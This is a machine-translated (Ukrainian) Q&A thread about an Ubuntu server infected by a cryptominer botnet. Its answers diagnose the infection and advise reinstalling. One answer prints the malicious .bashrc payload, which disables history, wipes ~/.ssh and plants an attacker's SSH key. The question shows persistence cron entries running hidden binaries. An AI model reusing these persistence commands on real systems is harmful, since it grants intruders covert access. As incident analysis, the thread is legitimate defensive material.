Странна робота Cron займає 100% CPU Ubuntu 18 LTS Server

21

Я продовжую показувати свої дивовижні роботи, і я не маю поняття, що вони роблять. Я зазвичай видаю kill -9, щоб зупинити їх. Вони займають 100% мого процесора і можуть працювати цілими днями, поки я не перевіряю. Хтось знає, що це означає?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Я запускаю сервер Ubuntu 18 LTS, повністю оновлений станом на вчора 24.07.2019

ОНОВЛЕННЯ

Я ціную всі відгуки. Я від’єднав усі накопичувачі даних та додатків, оскільки єдине, на що вплинуло, - це накопичувач ОС, я, принаймні, зробив цю річ належним чином. Я йду з повною перебудовою, з набагато більшою безпекою та більш безпечними методами.

server  cron  rsync 
MCP_infiltrator
джерело
8
.firefoxcatcheнапевно, нічого спільного з firefox не має - може це просто шахтарський майнер? Спробуйте завантажити виконавчі файли у virustotal.
Том Віггерс,
1
Файли, якими керує цей кронтаб, є /root/.firefoxcatche/a/updі/root/.firefoxcatche/b/sync
Том Віггерс,
2
"Я не можу знайти кронтаб, щоб його збити", що це означає? чому sudo crontab -eредагування не працює? Але якщо це криптовалюта, яку ви не встановили ... вони будуть знову додані. Перший погляд у "/root/.firefoxcatche/a/upd", що він робить.
Rinzwind
2
"Чи потрібно мені ввійти як root, щоб потрапити туди?" Це питання, яке я не очікую від адміністратора. Вам справді потрібно знати, чим ви зараз займаєтесь. Змініть пароль адміністратора якнайшвидше. Огляньте файли, перелічені в cron. Викорінювати їх.
Rinzwind
1
але це так просто ;-) Я підтримую 10+ примірників Google хмари. З планом на випадок надзвичайних ситуацій я б міг уявити собі не так. Якщо щось подібне станеться, я знищив би кореневий екземпляр, створив новий, сканував диск даних на клон, просканував би відмінності та приєднав би його до екземпляра. і реалізуйте щось, щоб зафіксувати цю людину, щоб не допустити її повторення. У моєму випадку моя зарплата залежить від цього ;-)
Rinzwind

Відповіді:

40

Ваша машина, швидше за все, має зараження криптовалютою. Ви можете бачити когось іншого, який повідомляє про подібні назви файлів та поведінку під час виявлення реальної життєвої машини в Azure з Центром безпеки . Дивіться також Мій сервер Ubuntu має вірус ... Я його знайшов, але не можу його позбутися ... на Reddit.

Ви більше не можете довіряти цій машині, і вам слід її знову встановити. Будьте обережні з відновленням резервних копій.

Том Віггерс
джерело
8
Я згоден. кореневий пароль зіпсований, тому перевстановіть і будьте дуже обережні з резервною копією; це теж може бути там.
Rinzwind
9

Ваш апарат був заражений крипто-атакою шахтаря. У минулому я також стикався з подібною атакою викупного програмного забезпечення, і моя база даних була порушена. Я взяв дамп SQL для машини і переглянув версію машини (оскільки моя машина була VM, розміщеною на AWS EC2). Я також змінив групи безпеки машини, щоб заблокувати доступ до SSH та змінені паролі. Я також увімкнув ведення журналу, щоб записувати журнали, і експортувати їх до S3 щовечора.

beadityak
джерело
4

Те саме сталося і зі мною, і я вчора помітив. Я перевірив файл, /var/log/syslogі цей IP (185.234.218.40) виявився автоматично виконуваним кроні.

Я перевірив це на http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ), і він має кілька звітів. Ці файли були відредаговані трояном:

  • .bashrc
  • .ssh / санкціоновані_кеї

Я виявив це в кінці .bashrc(який виконується кожного разу, коли відкривається bash):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Це видалення вашого authorized_keysфайлу, який представляє собою список ключів SSH, до яких дозволено з'єднання без пароля. Потім додається ключ SSH для зловмисника:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Крім того, я знайшов цю папку:, /tmp/.X13-unix/.rsyncде є вся шкідливе програмне забезпечення. Я навіть знайшов файл, /tmp/.X13-unix/.rsync/c/ipфайл, що містить 70 000 IP-адрес, які, швидше за все, є іншими жертвами або серверами вузлів.

Є 2 рішення:

  • Додайте брандмауер, що блокує всі вихідні з'єднання, за винятком порту 22 та інших, які вам здаються необхідними, і увімкніть fail2ban, програму, яка забороняє IP-адресу після невдалої спроби пароля X

  • Вбийте всі завдання Cron:, ps aux | grep cronа потім вкажіть PID, який з'явиться

  • Змініть свій пароль на захищений

B:

  • Створіть резервні копії будь-яких потрібних вам файлів чи папок

  • Скиньте сервер і перевстановіть Ubuntu або безпосередньо створіть нову крапельку

    Як сказав Том Віггерс, ви, безумовно, є частиною ботнету для видобутку біткойна, а ваш сервер має задню панель . У задньому куточку використовується експлойт perl, розміщений тут файл:, /tmp/.X13-unix/.rsync/b/runщо містить це ( https://pastebin.com/ceP2jsUy )

Найбільш підозрілі папки, які я знайшов:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (що було відредаговано)

  • ~/.firefoxcatche

Нарешті, тут є стаття, що стосується Perl Backdoor: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Сподіваюсь, ви вважаєте це корисним.

Охакс
джерело
Я витер дисковод ОС і перевстановив Ubuntu, створив досить довгий пароль і нові ssh-ключі
MCP_infiltrator
Так, це гарне рішення :)
Oqhax
Це була дуже корисна відповідь - дякую, що ви зрозуміли факт, який ~/.bashrcбув відредагований. Я виявив, що для вбивства фальшивки rsyncмені довелося видати kill -9 <pid>.
Бенні Хілл
Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.